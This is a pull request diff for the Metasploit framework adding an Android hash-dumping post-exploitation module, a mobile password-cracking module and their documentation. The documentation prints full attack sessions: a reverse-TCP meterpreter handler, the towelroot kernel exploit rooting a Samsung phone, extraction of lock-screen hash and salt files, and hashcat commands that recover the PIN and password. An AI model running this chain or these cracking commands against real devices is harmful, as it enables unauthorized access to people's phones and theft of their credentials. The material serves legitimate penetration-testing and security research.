### PR TITLE
Android hashdumper

### DIFF
--- a/documentation/modules/auxiliary/analyze/crack_mobile.md
+++ b/documentation/modules/auxiliary/analyze/crack_mobile.md
@@ -4,19 +4,23 @@
   based password hashes, such as:
 
   * `android-sha1` based passwords
+  * `android-samsung-sha1` based passwords
+  * `android-md5` based passwords
 
   Formats:
 
-| Common       | John | Hashcat |
-|--------------| -----|---------|
-| android-sha1 | n/a  | 5800    |
+| Common               | John | Hashcat |
+|----------------------| -----|---------|
+| android-md5          | n/a  | 10      |
+| android-samsung-sha1 | n/a  | 5800    |
+| android-sha1         | n/a  | 110     |
 
   Sources of hashes can be found here:
   [source](https://hashcat.net/forum/thread-2202.html)
 
 ## Verification Steps
 
-  1. Have at least one user with a `android-sha1` password in the database
+  1. Have at least one user with a `android-sha1`, `android-samsung-sha1`, or `android-md5` password in the database
   2. Start msfconsole
   3. Do: ```use auxiliary/analyze/crack_mobile```
   4. Do: set cracker of choice
@@ -31,6 +35,17 @@
 
 ## Options
 
+   **MD5**
+
+   Crack `android-md5` based passwords.  Default is `true`
+
+   **SHA1**
+
+   Crack `android-sha1` (non-samsung) based passwords.  Default is `true`
+
+   **SAMSUNG**
+
+   Crack `android-samsung-sha1` based passwords.  Default is `true`
 
    **CONFIG**
 
@@ -165,4 +180,87 @@ nvmlDeviceGetFanSpeed(): Not Supported
 
 [*] Auxiliary module execution completed
 
+```
+
+### MD5, SHA1, SAMSUNG
+
+Create a password with each type, passwords are all `1234`.
+
+```
+msf5 > creds add user:samsungsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-samsung-sha1
+msf5 > creds add user:androidsha1 hash:9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5 jtr:android-sha1
+msf5 > creds add user:androidmd5 hash:1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 jtr:android-md5
+```
+
+```
+msf5 > use auxiliary/analyze/crack_mobile
+msf5 auxiliary(analyze/crack_mobile) > run
+
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20191113-29506-1xydi7
+[*] Wordlist file written out to /tmp/jtrtmp20191113-29506-aq6ph7
+[*] Checking android-sha1 hashes already cracked...
+[*] Cracking android-sha1 hashes in pin mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=ishUl4hb --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=110 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191113-29506-1xydi7 ?d?d?d?d?d?d?d?d
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-sha1 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=ishUl4hb --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=110 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191113-29506-1xydi7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=ishUl4hb --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=110 --attack-mode=0 /tmp/hashes_tmp20191113-29506-1xydi7 /tmp/jtrtmp20191113-29506-aq6ph7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type     Username     Cracked Password  Method
+ -----  ---------     --------     ----------------  ------
+ 127    android-sha1  androidsha1  1234              Pin
+
+[*] Checking android-samsung-sha1 hashes already cracked...
+[*] Cracking android-samsung-sha1 hashes in pin mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=SMD3wSMl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191113-29506-1xydi7 ?d?d?d?d?d?d?d?d
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-samsung-sha1 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=SMD3wSMl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191113-29506-1xydi7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-samsung-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=SMD3wSMl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --attack-mode=0 /tmp/hashes_tmp20191113-29506-1xydi7 /tmp/jtrtmp20191113-29506-aq6ph7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type             Username     Cracked Password  Method
+ -----  ---------             --------     ----------------  ------
+ 126    android-samsung-sha1  samsungsha1  1234              Pin
+ 127    android-sha1          androidsha1  1234              Pin
+
+[*] Checking android-md5 hashes already cracked...
+[*] Cracking android-md5 hashes in pin mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=outBsYDa --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=10 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191113-29506-1xydi7 ?d?d?d?d?d?d?d?d
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-md5 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=outBsYDa --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=10 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191113-29506-1xydi7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-md5 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=outBsYDa --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=10 --attack-mode=0 /tmp/hashes_tmp20191113-29506-1xydi7 /tmp/jtrtmp20191113-29506-aq6ph7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type             Username     Cracked Password  Method
+ -----  ---------             --------     ----------------  ------
+ 126    android-samsung-sha1  samsungsha1  1234              Pin
+ 127    android-sha1          androidsha1  1234              Pin
+ 128    android-md5           androidmd5   1234              Pin
+
+[*] Auxiliary module execution completed
 ```

--- a/documentation/modules/auxiliary/analyze/crack_mobile.md
+++ b/documentation/modules/auxiliary/analyze/crack_mobile.md
@@ -1,0 +1,168 @@
+## Vulnerable Application
+
+  This module attempts to use a password cracker to decode mobile (Android)
+  based password hashes, such as:
+
+  * `android-sha1` based passwords
+
+  Formats:
+
+| Common       | John | Hashcat |
+|--------------| -----|---------|
+| android-sha1 | n/a  | 5800    |
+
+  Sources of hashes can be found here:
+  [source](https://hashcat.net/forum/thread-2202.html)
+
+## Verification Steps
+
+  1. Have at least one user with a `android-sha1` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/crack_mobile```
+  4. Do: set cracker of choice
+  5. Do: ```run```
+  6. You should hopefully crack a password.
+
+## Actions
+
+   **hashcat**
+
+   Use hashcat (default).
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CRACKER_PATH**
+
+   The absolute path to the cracker executable.  Default behavior is to search `path`.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **Fork**
+
+   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+
+   **INCREMENTAL**
+
+   Run the cracker in incremental mode.  Default is `true`
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **SHOWCOMMAND**
+
+   Show the command being used run from the command line for debugging.  Default is `false`
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+   **WORDLIST**
+
+   Run the cracker in dictionary/wordlist mode.  Default is `true`
+
+## Scenarios
+
+### Sample Data
+
+The following is data which can be used to test integration, including adding entries
+to a wordlist and pot file to test various aspects of the cracker.
+
+```
+creds add user:androidsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-sha1
+```
+
+### Hashcat
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+msf5 post(android/gather/hashdump) > creds add user:androidsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-sha1
+msf5 post(android/gather/hashdump) > previous
+msf5 auxiliary(analyze/crack_mobile) > set showcommand true
+showcommand => true
+msf5 auxiliary(analyze/crack_mobile) > run
+
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20191112-9775-19hbg7j
+[*] Wordlist file written out to /tmp/jtrtmp20191112-9775-f3q0r1
+[*] Checking android-sha1 hashes already cracked...
+[*] Cracking android-sha1 hashes in pin mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=UrEHXRVq --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191112-9775-19hbg7j ?d?d?d?d?d?d?d?d
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-sha1 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=UrEHXRVq --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191112-9775-19hbg7j
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=UrEHXRVq --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --attack-mode=0 /tmp/hashes_tmp20191112-9775-19hbg7j /tmp/jtrtmp20191112-9775-f3q0r1
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type     Username     Cracked Password  Method
+ -----  ---------     --------     ----------------  ------
+ 98     android-sha1  androidsha1  1234              Pin
+
+[*] Auxiliary module execution completed
+
+```

--- a/documentation/modules/post/android/gather/hashdump.md
+++ b/documentation/modules/post/android/gather/hashdump.md
@@ -1,0 +1,223 @@
+## Description
+
+Post Module to dump the password hashes for Android System. Root is required.
+To perform this operation, two things are needed.  First, a password.key file
+is required as this contains the hash but no salt.  Next, a sqlite3 database
+is needed (with supporting files) to pull the salt from.  Combined, this
+creates the hash we need.  This can be cracked with Hashcat, mode 5800.
+Samsung devices only have SHA1 hashes, while most other Android devices
+also have an MD5 hash.  
+
+A PIN is simply an all digit password.  
+
+A Pattern lock is also an all digit password where each dot is represented by a number.
+
+```
+1   2   3
+
+4   5   6
+
+7   8   9
+```
+
+## Verification Steps
+
+  1. Get root on an Android device
+  2. Start msfconsole
+  3. Do: ```use post/android/gather/hashdump```
+  4. Do: ```set session [session]```
+  5. Do: ```run```
+  6. You should get a password hash to crack.
+
+## Scenarios
+
+### Passworded - Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)
+
+Using `towelroot` to get root.  Device is set to use Password as the screen lock.  Password is `test`.
+
+```
+resource (android.128.rb)> use exploit/multi/handler
+resource (android.128.rb)> set payload android/meterpreter_reverse_tcp
+payload => android/meterpreter_reverse_tcp
+resource (android.128.rb)> set lport 9999
+lport => 9999
+resource (android.128.rb)> setg lhost 111.111.1.111
+lhost => 111.111.1.111
+resource (android.128.rb)> setg verbose true
+verbose => true
+resource (android.128.rb)> run
+[*] Started reverse TCP handler on 111.111.1.111:9999 
+[*] Meterpreter session 1 opened (111.111.1.111:9999 -> 222.222.2.222:42547) at 2019-10-27 20:48:49 -0400
+WARNING: Local file /root/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
+WARNING: Local files may be incompatible with the Metasploit Framework
+
+meterpreter > background
+[*] Backgrounding session 1...
+resource (android.128.rb)> use towelroot
+
+Matching Modules
+================
+
+   #  Name                                 Disclosure Date  Rank       Check  Description
+   -  ----                                 ---------------  ----       -----  -----------
+   0  exploit/android/local/futex_requeue  2014-05-03       excellent  Yes    Android 'Towelroot' Futex Requeue Kernel Exploit
+
+
+[*] Using exploit/android/local/futex_requeue
+resource (android.128.rb)> set session 1
+session => 1
+resource (android.128.rb)> run
+
+[*] Started reverse TCP handler on 111.111.1.111:4444 
+[+] Android version 4.4.2 appears to be vulnerable
+[*] Found device: d2vzw
+[*] Fingerprint: Verizon/d2vzw/d2vzw:4.4.2/KOT49H/I535VRUDNE1:user/release-keys
+[*] Using target: New Samsung
+[*] Loading exploit library /data/data/com.metasploit.stage/files/vnytm
+[*] Loaded library /data/data/com.metasploit.stage/files/vnytm, deleting
+[*] Waiting 300 seconds for payload
+[*] Transmitting intermediate stager...(136 bytes)
+[*] Sending stage (904600 bytes) to 222.222.2.222
+[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:51741) at 2019-10-27 20:49:34 -0400
+
+meterpreter > background
+[*] Backgrounding session 2...
+resource (android.128.rb)> use post/android/gather/hashdump
+resource (android.128.rb)> set session 2
+session => 2
+resource (android.128.rb)> run
+
+[!] SESSION may not be compatible with this module.
+[*] Attempting to determine unsalted hash
+[+] Saved password.key
+[*] Attempting to determine salt
+[*] OS Version: 4.4.2
+[*] Attempting to load >=4.3.0 Android settings file
+[+] Saved locksettings.db with length 4096
+[+] Saved locksettings.db-wal with length 140112
+[+] Saved locksettings.db-shm with length 32768
+[+] Password Salt: 4aafc54dc502e88b
+[+] SHA1: EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b
+[+] Crack with: hashcat -m 5800 EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b
+[*] Post module execution completed
+msf5 post(android/gather/hashdump) > creds
+Credentials
+===========
+
+host  origin        service  public  private                                                    realm  private_type        JtR Format
+----  ------        -------  ------  -------                                                    -----  ------------        ----------
+      222.222.2.222                  EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b         Nonreplayable hash  android-sha1
+
+
+```
+
+We can now crack the password with hashcat as per the last line.
+
+```
+# hashcat -m 5800 EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b --show
+ea8457de97836c955082ae77dbe2cd86a4e8bc0e:4aafc54dc502e88b:test
+```
+
+### PIN - Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)
+
+Using `towelroot` to get root.  Device is set to use PIN as the screen lock.  Password is `1234`.
+
+```
+resource (android.128.rb)> use exploit/multi/handler
+resource (android.128.rb)> set payload android/meterpreter_reverse_tcp
+payload => android/meterpreter_reverse_tcp
+resource (android.128.rb)> set lport 9999
+lport => 9999
+resource (android.128.rb)> setg lhost 111.111.1.111
+lhost => 111.111.1.111
+resource (android.128.rb)> setg verbose true
+verbose => true
+resource (android.128.rb)> run
+[*] Started reverse TCP handler on 111.111.1.111:9999 
+[*] Meterpreter session 1 opened (111.111.1.111:9999 -> 222.222.2.222:39987) at 2019-10-27 21:04:57 -0400
+WARNING: Local file /root/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
+WARNING: Local files may be incompatible with the Metasploit Framework
+
+meterpreter > background
+[*] Backgrounding session 1...
+resource (android.128.rb)> use towelroot
+
+Matching Modules
+================
+
+   #  Name                                 Disclosure Date  Rank       Check  Description
+   -  ----                                 ---------------  ----       -----  -----------
+   0  exploit/android/local/futex_requeue  2014-05-03       excellent  Yes    Android 'Towelroot' Futex Requeue Kernel Exploit
+
+
+[*] Using exploit/android/local/futex_requeue
+resource (android.128.rb)> set session 1
+session => 1
+resource (android.128.rb)> run
+
+[*] Started reverse TCP handler on 111.111.1.111:4444 
+[+] Android version 4.4.2 appears to be vulnerable
+[*] Found device: d2vzw
+[*] Fingerprint: Verizon/d2vzw/d2vzw:4.4.2/KOT49H/I535VRUDNE1:user/release-keys
+[*] Using target: New Samsung
+[*] Loading exploit library /data/data/com.metasploit.stage/files/rlotf
+[*] Loaded library /data/data/com.metasploit.stage/files/rlotf, deleting
+[*] Waiting 300 seconds for payload
+[*] Transmitting intermediate stager...(136 bytes)
+[*] Sending stage (904600 bytes) to 222.222.2.222
+[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:57268) at 2019-10-27 21:05:25 -0400
+
+meterpreter > background
+[*] Backgrounding session 2...
+resource (android.128.rb)> use post/android/gather/hashdump
+resource (android.128.rb)> set session 2
+session => 2
+resource (android.128.rb)> run
+
+[!] SESSION may not be compatible with this module.
+[*] Attempting to determine unsalted hash
+[+] Saved password.key
+[*] Attempting to determine salt
+[*] OS Version: 4.4.2
+[*] Attempting to load >=4.3.0 Android settings file
+[+] Saved locksettings.db with length 4096
+[+] Saved locksettings.db-wal with length 206032
+[+] Saved locksettings.db-shm with length 32768
+[+] Password Salt: 4aafc54dc502e88b
+[+] SHA1: 9E201EFFCC29C8F54E1ECEC307CB1DA18B6B6E6B:4aafc54dc502e88b
+[+] Crack with: hashcat -m 5800 9E201EFFCC29C8F54E1ECEC307CB1DA18B6B6E6B:4aafc54dc502e88b
+[*] Post module execution completed
+
+```
+We can now crack the password with hashcat as per the last line.
+
+```
+# hashcat -m 5800 9E201EFFCC29C8F54E1ECEC307CB1DA18B6B6E6B:4aafc54dc502e88b -a 3 ?d?d?d?d
+hashcat (v5.1.0) starting...
+
+...
+
+Approaching final keyspace - workload adjusted.  
+
+9e201effcc29c8f54e1ecec307cb1da18b6b6e6b:4aafc54dc502e88b:1234
+                                                 
+Session..........: hashcat
+Status...........: Cracked
+Hash.Type........: Samsung Android Password/PIN
+Hash.Target......: 9e201effcc29c8f54e1ecec307cb1da18b6b6e6b:4aafc54dc502e88b
+Time.Started.....: Sun Oct 27 21:06:04 2019 (0 secs)
+Time.Estimated...: Sun Oct 27 21:06:04 2019 (0 secs)
+Guess.Mask.......: ?d?d?d?d [4]
+Guess.Queue......: 1/1 (100.00%)
+Speed.#1.........:    41481 H/s (0.31ms) @ Accel:32 Loops:15 Thr:1024 Vec:1
+Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
+Progress.........: 1000/10000 (10.00%)
+Rejected.........: 0/1000 (0.00%)
+Restore.Point....: 0/1000 (0.00%)
+Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1020-1023
+Candidates.#1....: 1234 -> 1764
+Hardware.Mon.#1..: Temp: 54c Util:100% Core: 705MHz Mem:1400MHz Bus:16
+
+Started: Sun Oct 27 21:06:00 2019
+Stopped: Sun Oct 27 21:06:05 2019
+```

--- a/lib/metasploit/framework/hashes/identify.rb
+++ b/lib/metasploit/framework/hashes/identify.rb
@@ -6,6 +6,7 @@
 
 # Resource list:
 #  https://code.google.com/archive/p/hash-identifier/
+#  https://github.com/psypanda/hashID
 #  https://hashcat.net/wiki/doku.php?id=example_hashes
 #  http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats
 #  https://openwall.info/wiki/john/sample-hashes
@@ -80,6 +81,11 @@ def identify_hash(hash)
       return 'PBKDF2-HMAC-SHA1'
     when hash.start_with?('$B$') && hash.split('$').last.length == 32
       return 'mediawiki'
+    # mobile
+    when hash  =~/^[A-F0-9]{40}:[a-f0-9]{16}$/
+      return 'android-sha1'
+    when hash  =~/^[A-F0-9]{32}:[a-f0-9]{16}$/
+      return 'android-md5'
   end
   ''
 end

--- a/lib/metasploit/framework/password_crackers/cracker.rb
+++ b/lib/metasploit/framework/password_crackers/cracker.rb
@@ -172,8 +172,12 @@ module Metasploit
             '400'
           when 'mediawiki' # mediawiki b type
             '3711'
-          when 'android-sha1'
+          when 'android-samsung-sha1'
             '5800'
+          when 'android-sha1'
+            '110'
+          when 'android-md5'
+            '10'
           else
             nil
           end

--- a/lib/metasploit/framework/password_crackers/hashcat/formatter.rb
+++ b/lib/metasploit/framework/password_crackers/hashcat/formatter.rb
@@ -61,7 +61,7 @@ def hash_to_hashcat(cred)
     when /md5|des|bsdi|crypt|bf/, /mssql|mssql05|mssql12|mysql/, /sha256|sha-256/,
          /sha512|sha-512/, /xsha|xsha512|PBKDF2-HMAC-SHA512/,
          /mediawiki|phpass|PBKDF2-HMAC-SHA1/,
-         /android-sha1/
+         /android-sha1/, /android-samsung-sha1/, /android-md5/
       #            md5(crypt), des(crypt), b(crypt), sha256, sha512, xsha, xsha512, PBKDF2-HMAC-SHA512
       # hash-mode: 500          1500        3200      7400    1800   122   1722       7100
       #            mssql, mssql05, mssql12, mysql, mysql-sha1

--- a/lib/metasploit/framework/password_crackers/hashcat/formatter.rb
+++ b/lib/metasploit/framework/password_crackers/hashcat/formatter.rb
@@ -60,13 +60,16 @@ def hash_to_hashcat(cred)
       return cred.private.data.downcase.sub('*','')
     when /md5|des|bsdi|crypt|bf/, /mssql|mssql05|mssql12|mysql/, /sha256|sha-256/,
          /sha512|sha-512/, /xsha|xsha512|PBKDF2-HMAC-SHA512/,
-         /mediawiki|phpass|PBKDF2-HMAC-SHA1/
+         /mediawiki|phpass|PBKDF2-HMAC-SHA1/,
+         /android-sha1/
       #            md5(crypt), des(crypt), b(crypt), sha256, sha512, xsha, xsha512, PBKDF2-HMAC-SHA512
       # hash-mode: 500          1500        3200      7400    1800   122   1722       7100
       #            mssql, mssql05, mssql12, mysql, mysql-sha1
       # hash-mode: 131,    132,     1731    200        300
       #            mediawiki, phpass, PBKDF2-HMAC-SHA1
       # hash-mode: 3711,      400,    12001
+      #            android-sha1
+      # hash-mode: 5800
       return cred.private.data
     end
   end

--- a/modules/auxiliary/analyze/crack_mobile.rb
+++ b/modules/auxiliary/analyze/crack_mobile.rb
@@ -1,0 +1,250 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/auxiliary/password_cracker'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::PasswordCracker
+
+  def initialize
+    super(
+      'Name'            => 'Password Cracker: Mobile',
+      'Description'     => %Q{
+          This module uses Hashcat to identify weak passwords that have been
+        acquired from Android systems.  These utilize MD5 or SHA1 hashing.
+        Android SHA1 is format 5800 in Hashcat.  Currently only SHA1 is supported.
+        JTR does not support Android hashes at the time of writing.
+      },
+      'Author'          =>
+        [
+          'h00die'
+        ] ,
+      'License'         => MSF_LICENSE,  # JtR itself is GPLv2, but this wrapper is MSF (BSD)
+      'Actions'         =>
+        [
+          ['hashcat', {'Description' => 'Use Hashcat'}],
+        ],
+      'DefaultAction' => 'hashcat',
+    )
+
+    register_options(
+      [
+        OptBool.new('INCREMENTAL',[false, 'Run in incremental mode', true]),
+        OptBool.new('WORDLIST',[false, 'Run in wordlist mode', true])
+      ]
+    )
+  end
+
+  def show_command(cracker_instance)
+    return unless datastore['ShowCommand']
+    if action.name == 'john' # leaving this code here figuring jtr will eventually come around, but its an unused code block
+      cmd = cracker_instance.john_crack_command
+    elsif action.name == 'hashcat'
+      cmd = cracker_instance.hashcat_crack_command
+    end
+    print_status("   Cracking Command: #{cmd.join(' ')}")
+  end
+
+  def print_results(tbl, cracked_hashes)
+    cracked_hashes.each do |row|
+      unless tbl.rows.include? row
+        tbl << row
+      end
+    end
+    tbl.to_s
+  end
+
+  def run
+    def process_crack(results, hashes, cred, hash_type, method)
+      return results if cred['core_id'].nil? # make sure we have good data
+      # make sure we dont add the same one again
+      if results.select {|r| r.first == cred['core_id']}.empty?
+        results << [cred['core_id'], hash_type, cred['username'], cred['password'], method]
+      end
+
+      create_cracked_credential( username: cred['username'], password: cred['password'], core_id: cred['core_id'])
+      results
+    end
+
+    def check_results(passwords, results, hash_type, hashes, method)
+      passwords.each do |password_line|
+        password_line.chomp!
+        next if password_line.blank?
+        fields = password_line.split(":")
+        # If we don't have an expected minimum number of fields, this is probably not a hash line
+        if action.name == 'john'
+          next unless fields.count >=3
+          cred = {}
+          cred['username'] = fields.shift
+          cred['core_id']  = fields.pop
+          4.times { fields.pop } # Get rid of extra :
+          cred['password'] = fields.join(':') # Anything left must be the password. This accounts for passwords with semi-colons in it
+          results = process_crack(results, hashes, cred, hash_type, method)
+        elsif action.name == 'hashcat'
+          next unless fields.count >= 2
+          hash = fields.shift
+          password = fields.join(':') # Anything left must be the password. This accounts for passwords with : in them
+          next if hash.include?("Hashfile '") && hash.include?("' on line ") # skip error lines
+          hashes.each do |h|
+            next unless h['hash'] == hash
+            cred = {'core_id' => h['id'],
+                    'username' => h['un'],
+                    'password' => password}
+            results = process_crack(results, hashes, cred, hash_type, method)
+          end
+        end
+      end
+      results
+    end
+
+    tbl = Rex::Text::Table.new(
+      'Header'  => 'Cracked Hashes',
+      'Indent'   => 1,
+      'Columns' => ['DB ID', 'Hash Type', 'Username', 'Cracked Password', 'Method']
+    )
+
+    # array of hashes in jtr_format in the db, converted to an OR combined regex
+    hashes_regex = ['android-sha1']
+    # array of arrays for cracked passwords.
+    # Inner array format: db_id, hash_type, username, password, method_of_crack
+    results = []
+
+    cracker = new_password_cracker
+    cracker.cracker = action.name
+
+    cracker_version = cracker.cracker_version
+    if action.name == 'john' and not cracker_version.include?'jumbo'
+      fail_with(Failure::BadConfig, 'John the Ripper JUMBO patch version required.  See https://github.com/magnumripper/JohnTheRipper')
+    end
+    print_good("#{action.name} Version Detected: #{cracker_version}")
+
+    # create the hash file first, so if there aren't any hashes we can quit early
+    # hashes is a reference list used by hashcat only
+    cracker.hash_path, hashes = hash_file(hashes_regex)
+
+    wordlist = wordlist_file
+    unless wordlist
+      print_error('This module cannot run without a database connected. Use db_connect to connect to a database.')
+      return
+    end
+
+    wordlist.close
+    print_status "Wordlist file written out to #{wordlist.path}"
+
+    cleanup_files = [cracker.hash_path, wordlist.path]
+
+    hashes_regex.each do |format|
+      # dupe our original cracker so we can safely change options between each run
+      cracker_instance = cracker.dup
+      cracker_instance.format = format
+
+      if action.name == 'john'
+        cracker_instance.fork = datastore['FORK']
+      end
+
+      # first check if anything has already been cracked so we don't report it incorrectly
+      print_status "Checking #{format} hashes already cracked..."
+      results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Already Cracked/POT')
+      vprint_good(print_results(tbl, results))
+
+      if action.name == 'john'
+        print_status "Cracking #{format} hashes in single mode..."
+        cracker_instance.mode_single(wordlist.path)
+        show_command cracker_instance
+        cracker_instance.crack do |line|
+          vprint_status line.chomp
+        end
+        results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Single')
+        vprint_good(print_results(tbl, results))
+
+        print_status "Cracking #{format} hashes in normal mode"
+        cracker_instance.mode_normal
+        show_command cracker_instance
+        cracker_instance.crack do |line|
+          vprint_status line.chomp
+        end
+        results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Normal')
+        vprint_good(print_results(tbl, results))
+      end
+
+      if action.name == 'hashcat'
+        print_status "Cracking #{format} hashes in pin mode..."
+        cracker_instance.mode_pin
+        show_command cracker_instance
+        cracker_instance.crack do |line|
+          vprint_status line.chomp
+        end
+        results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Pin')
+        vprint_good(print_results(tbl, results))
+      end
+
+      if datastore['INCREMENTAL']
+        print_status "Cracking #{format} hashes in incremental mode..."
+        cracker_instance.mode_incremental
+        show_command cracker_instance
+        cracker_instance.crack do |line|
+          vprint_status line.chomp
+        end
+        results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Incremental')
+        vprint_good(print_results(tbl, results))
+      end
+
+      if datastore['WORDLIST']
+        print_status "Cracking #{format} hashes in wordlist mode..."
+        cracker_instance.mode_wordlist(wordlist.path)
+        # Turn on KoreLogic rules if the user asked for it
+        if action.name == 'john' && datastore['KORELOGIC']
+          cracker_instance.rules = 'KoreLogicRules'
+          print_status "Applying KoreLogic ruleset..."
+        end
+        show_command cracker_instance
+        cracker_instance.crack do |line|
+          vprint_status line.chomp
+        end
+
+        results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Wordlist')
+        vprint_good(print_results(tbl, results))
+      end
+
+      #give a final print of results
+      print_good(print_results(tbl, results))
+    end
+
+    if datastore['DeleteTempFiles']
+      cleanup_files.each do |f|
